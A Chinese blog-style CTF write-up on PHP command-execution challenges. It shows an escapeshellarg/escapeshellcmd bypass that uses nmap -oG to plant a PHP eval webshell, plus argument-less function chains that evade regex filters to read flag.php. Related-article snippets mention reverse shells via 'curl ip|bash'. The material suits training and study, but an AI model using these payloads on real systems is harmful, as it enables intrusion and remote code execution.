命令执行类型CTF题目总结

最新推荐文章于 2025-11-01 18:13:02 发布
原创 最新推荐文章于 2025-11-01 18:13:02 发布 · 1.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细分析了一道PHP命令执行类型的CTF题目,涉及了escapeshellarg和escapeshellcmd函数的使用,以及如何通过nmap命令构造payload进行漏洞利用。在禁止套娃的环节,讨论了正则过滤的规避方法,如使用scandir、localeconv等函数读取文件,结合数组操作函数和文件读取函数尝试获取flag。

命令执行类型CTF题

php命令执行

buu Online Tool

一段php代码审计:
在这里插入图片描述
大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellargescapeshellcmd方法转义后,转到之前创建的文件夹目录,执行nmap命令。
如果两方法以上述顺序执行会有绕过漏洞

  1. 传入的参数是:172.17.0.2‘ -v -d a=1
  2. 经过escapeshellarg处理后变成了’172.17.0.2’’ ’ -v -d a=1’ ,即先对单引号转义,再用单引号将语句左右用单引号括起
  3. 经过escapeshellcmd处理后变成了’172.17.0.2’\’ ’ -v -d a=1’ ,这是因为escapeshellcmd对\ 以及最后那个不配对的引号进行了转义
  4. 最后执行的命令是 curl ’172.17.0.2’ \ \ ’ ’ -v -d a=1\ ’ ,由于中间的 \ \ 被解释为 \ 而不再是转义字符,所以后面的 ’ 没有被转义,与再后面的 ’ 配对成了一个空白连接符,所以可以简化成 curl 172.10.0.2\ -v -d a=1’ ,即向172.17.0.2\ -v -d a=1’ ,即向172.17.0.2\ 发起请求,POST数据为a=1 ’

经过两次转义后出现了问题,没有考虑到单引号。
虽然单引号可以逃逸,但执行cmd的连接符被转义过滤,能利用的只有nmap命令。
nmap命令中能执行-oG,将命令和结果写入文件,构造payload:

?host=’ <?php @eval($_POST['hack'])l;?> -oG hack.php ’

执行后会返回文件名,蚁剑连接找到flag

禁止套娃

进去后没有任何提示,buu也不能扫,只能手动试,除了.git是403,还有flag.php空页面.拿GitHack扫一下.git,能得到index.php的源码:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

有三条正则过滤:

  1. 过滤掉data,php,filter,phar,目的是不允许伪协议读文件
  2. (?R)?:递归过滤括号内表达式(由内到外),只能以字母与下划线组合再拼接(),用空字符代替后与;作强比较(可以自己本地写正则试一下),目的是不允许命令执行含参
  3. 过滤掉绝对路径的目录
    既然要使用无参函数,可以用scandir(*)读当前目录:

scandir(*)    扫描当前目录
localeconv() 函数返回包含本地数字及货币格式的格式信息的数组
pos().current()返回数组第一个值

可以构造 exp=print_r(scandir(pos(localeconv())));读当前目录
在这里插入图片描述

//数组操作函数

  1. end() 数组指针指向最后一位
  2. next() 数组指针指向下一位
  3. array_reverse() 将数组颠倒
  4. array_rand() 随机返回数组的键名
  5. array_flip() 交换数组的键和值

//读文件函数

  1. file_get_content()
  2. readfile()
  3. highlight_file()
  4. show_source()

再利用数组操作函数读flag.php
payload1:?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
或者利用随机数撞出来(多刷几次):
paylaod2:?exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));

在这里插入图片描述
还可以利用session_id,将sessionID改成flag.php

session_start() 告诉PHP使用session;
session_id() 获取当前的session_id值;
手动设置cookie中PHPSESSID=flag.php;

再构造payload3:?exp=show_source(session_id(session_start()));
在这里插入图片描述

CTF命令执行题目解题思路
悦分享
08-02 1078
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
CTF web入门之命令执行 完整版
qq_41701460的博客
04-11 841
绕过思路:过滤了system,echo,这里可以使用passthru,但是这次还过滤了括号,所以passthru也没有办法用,这里使用文件包含,通过php://filter协议进行读取文件。可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的。**web36:**同web33 在前面的基础上,过滤了数字。.被过滤,则直接采用*,*表示多个字符,?**web33:**多了个双引号 和上面的题一样。**web30:**命令执行,需要严格的过滤。
CTF-命令执行部分总结
weixin_44770698的博客
05-29 2002
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF命令执行部分总结
weixin_44770698的博客
12-19 902
CTF命令执行
CTF命令执行总结--初学者应该了解的
最新发布
2502_91116367的博客
11-01 1004
PHP命令与代码执行及文件查看摘要 命令执行函数 system()直接输出结果并返回最后一行;exec()需通过数组捕获完整输出;passthru()适合二进制数据;shell_exec()返回完整字符串;popen()通过文件指针处理流式命令;反引号与shell_exec()等效;proc_open提供更灵活的文件指针控制。 代码执行方式 eval()直接执行字符串代码;assert()可执行代码但PHP7.2后不推荐;preg_replace()的/e修饰符已废弃;create_function()易被
CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 3481
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
CTF命令执行知识点总结
SuperherRo的博客
08-28 307
echo "Y2F0IGZs YWcucGhwCg==" | base64 -d|bash # 解码为cat flag.php并执行。# 分号隔开每条命令,整行命令按照从左到右的顺序执行,彼此之间互不影响,所有的命令都会执行。# 一般情况下想flag、php这种字符会被ban掉,这种时候就需要进行绕过了。| # 只执行后面那条命令。& #两条命令都会执行。&& # 两条命令都会执行。# 匹配单个任意字符。
ctf命令执行小结
舞动的獾
10-04 4727
1.相关函数 eval函数eval函数能够将字符串当作命令去执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
ctf xor题_一道使用异或来命令执行CTF题目
weixin_28944067的博客
01-26 2663
0x01 命令执行命令执行是通过各种绕过方式来达到执行命令的方式拿到flag,在CTF中有很多常见绕过的方式,比如过滤了什么 cat | read | ls | dir | head | tail 等读文件的敏感命令,但是这些的话还是有方法绕过的,比如说 cat 可以更改为 tac 那么就会倒读进行读取了。0x02 审计代码我们可以审计一下下面的代码来进行剖析一个绕过的方式,首先该代码进行判断了正...
CTF比赛最新题目答案
10-25
因此,在CTF比赛的环境中,如果题目提示使用su命令进行提权,可能是要求参赛者寻找系统中配置不当的用户权限。 在解决此类题目时,参赛者需要具备基础的Linux系统知识,熟悉文件系统的目录结构,了解如何在终端中...
CTF】利用dockerfile复现CTF题目
网络空间安全|人工智能|计算机科学
10-22 811
(最后的点不能丢)
ctfshow---命令执行
fainpo的博客
03-20 1860
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
CTF知识集-命令执行
星河梦瑾的博客
12-17 1402
includePATHAlinux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令。
CTF-命令执行
Luodehahajiang的博客
07-03 2628
ctf 命令执行 命令执行函数 命令执行绕过方法
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1670
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
命令执行题目加理解
zbbjya的博客
03-21 1046
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.youkuaiyun.com/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
CTF-WEB篇 攻防世界题目实战解析command_execution
2301_76565920的博客
04-21 1685
command_execution (命令执行) 难度:2。Linux命令的使用,利用ping命令执行漏洞。(类比与sql注入)
指令执行过程(习题)
weixin_43638873的博客
09-05 2445
按照题目中的说法,不采用Cache也不用指令预取,那么当运行到这条指令时,指令尚未取出,并且只能从内存中取。 机器周期一般以内存读取一条指令字的最短时间来定义,而且是可以变长的。 计算机中的取指过程: 转移指令的指令周期: 在取指过程中,MAR(地址寄存器)相当于半路上的中转站 (***第二次对于PC的修改在无条件跳转指令中必定会发生,而在有条件跳转指令中则未必发生,因此题目要强调“无条件跳转指令”***) 取指操作是由控制器自动进行的,如果控制器...
基础题目五:命令执行
king丶
07-31 1482
基础题目五:命令执行 发现过滤 cat | &符没过滤 127.0.0.1& 能执行 127.0.0.1&cat ../key.php 发现还是不行。 那就是过滤了cat 使用\ 127.0.0.1&c\at ../key.php 还是不行,过滤了key 使用通配符 127.0.0.1&c\at ../ke* 通配符 通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查
ctf题目关于文件包含类型
01-20
### CTF 文件包含类型题目解题思路 #### PHP本地文件包含漏洞概述 在CTF竞赛中,PHP本地文件包含(Local File Inclusion, LFI)是一种常见的Web安全漏洞。当应用程序允许用户输入控制`include()`、`require()`等...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值